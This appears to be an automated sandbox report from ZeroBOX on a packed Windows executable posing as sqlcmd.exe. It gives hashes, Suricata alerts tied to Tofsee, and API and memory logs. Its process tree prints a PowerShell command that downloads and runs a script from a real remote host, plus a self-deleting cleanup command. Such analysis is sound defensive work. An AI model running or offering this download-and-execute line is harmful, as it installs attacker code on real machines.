Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 9, 2023, 9:52 a.m.	March 9, 2023, 10:03 a.m.

Size	196.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`fc4462b1448b7db9f905be31b1bb288d`
SHA256	`87884144ff48d4fb0b4dc7d7677369524be8042dd195a1080fddba1dda290821`
CRC32	`108F4306`
ssdeep	`3072:3M7l92L2002YwWly6kAeGj7wYp3wwXmx9y7WAMWkQh0khzlqsy7Ft6:c7l9/K9TAMk+sy736`
Yara	UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library OS_Processor_Check_Zero - OS Processor Check Malicious_Packer_Zero - Malicious Packer IsPE32 - (no description) PE_Header_Zero - PE File Signature

sqlcmd.exe "C:\Users\test22\AppData\Local\Temp\sqlcmd.exe"
2560
- cmd.exe "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.imagn.world/storage/debug2.ps1')"
  2620
  - powershell.exe powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.imagn.world/storage/debug2.ps1')
    2704
- cmd.exe "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\sqlcmd.exe" >> NUL
  2868
  - PING.EXE ping 127.0.0.1
    2936

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 121.254.136.27 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.57	23.216.159.81
www.imagn.world	A 104.26.6.106 A 104.26.7.106 A 172.67.75.82	104.26.6.106

IP Address	Status	Action
121.254.136.57	Active	Moloch
164.124.101.2	Active	Moloch
172.67.75.82	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49170 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2027870	ET INFO Observed DNS Query to .world TLD	Potentially Bad Traffic
TCP 192.168.56.101:49178 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49165 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49167 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49173 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49171 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49174 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49175 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49177 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49180 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49185 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:53004 -> 164.124.101.2:53	2027870	ET INFO Observed DNS Query to .world TLD	Potentially Bad Traffic
TCP 192.168.56.101:49162 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49168 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49172 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49176 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49179 -> 172.67.75.82:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49170 172.67.75.82:443	None	None	None
TLSv1 192.168.56.101:49178 172.67.75.82:443	None	None	None
TLSv1 192.168.56.101:49165 172.67.75.82:443	C=US, O=Let's Encrypt, CN=R3	CN=*.imagn.world	42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c
TLSv1 192.168.56.101:49166 172.67.75.82:443	C=US, O=Let's Encrypt, CN=R3	CN=*.imagn.world	42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c
TLSv1 192.168.56.101:49167 172.67.75.82:443	C=US, O=Let's Encrypt, CN=R3	CN=*.imagn.world	42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c
TLSv1 192.168.56.101:49173 172.67.75.82:443	None	None	None
TLSv1 192.168.56.101:49171 172.67.75.82:443	C=US, O=Let's Encrypt, CN=R3	CN=*.imagn.world	42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c
TLSv1 192.168.56.101:49174 172.67.75.82:443	C=US, O=Let's Encrypt, CN=R3	CN=*.imagn.world	42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c
TLSv1 192.168.56.101:49175 172.67.75.82:443	C=US, O=Let's Encrypt, CN=R3	CN=*.imagn.world	42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c
TLSv1 192.168.56.101:49177 172.67.75.82:443	C=US, O=Let's Encrypt, CN=R3	CN=*.imagn.world	42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c
TLSv1 192.168.56.101:49180 172.67.75.82:443	C=US, O=Let's Encrypt, CN=R3	CN=*.imagn.world	42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c
TLSv1 192.168.56.101:49185 172.67.75.82:443	C=US, O=Let's Encrypt, CN=R3	CN=*.imagn.world	42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c
TLSv1 192.168.56.101:49162 172.67.75.82:443	C=US, O=Let's Encrypt, CN=R3	CN=*.imagn.world	42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c
TLSv1 192.168.56.101:49168 172.67.75.82:443	None	None	None
TLSv1 192.168.56.101:49172 172.67.75.82:443	C=US, O=Let's Encrypt, CN=R3	CN=*.imagn.world	42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c
TLSv1 192.168.56.101:49176 172.67.75.82:443	C=US, O=Let's Encrypt, CN=R3	CN=*.imagn.world	42:53:6a:2c:36:7a:df:fb:c7:90:1b:e2:fe:1f:19:1a:81:fe:e2:2c
TLSv1 192.168.56.101:49179 172.67.75.82:443	None	None	None

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 9, 2023, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 9, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 9, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 9, 2023, 9:52 a.m.			0	0

Command line console output was observed (20 events)

Time & API	Arguments	Status	Return
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: Pinging 127.0.0.1 console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: with 32 bytes of data: console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), console_handle: 0x00000007	1	1
WriteConsoleA March 9, 2023, 9:52 a.m.	buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000451ed0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004ddf50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004ddf50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004ddf50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004ddf50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004ddf50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004ddc40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004ddc40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004ddc40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004ddc40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de490 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de490 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de490 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de260 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de260 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de260 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de8f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de8f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de8f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de8f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de8f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de8f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de8f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de8f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de9d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de9d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de9d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000436490 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000436490 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de3b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004de3b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000436650 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000436650 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000436650 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004c98b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004c98b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004c98b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004c98b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8a3470 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8a3470 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8ffed0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8ffed0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8ffed0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 9, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8ffed0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 9, 2023, 9:52 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.gfids

The file contains an unknown PE resource name possibly indicative of a packer (2 events)

resource name	AFX_DIALOG_LAYOUT
resource name	None

Powershell script has download & invoke calls (1 event)

Performs some HTTP requests (1 event)

request

GET http://apps.identrust.com/roots/dstrootcax3.p7c

Allocates read-write-execute memory (usually to unpack itself) (50 out of 190 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002950000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39f1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c6e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c6e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c6f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c6f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c6f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c6f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c6f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c6f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c6f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c6f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c70000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c70000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c70000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c70000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c70000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c71000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c71000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c71000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c71000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c6e000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00052000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0010a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 9:52 a.m.	process_identifier: 2704 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a04000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
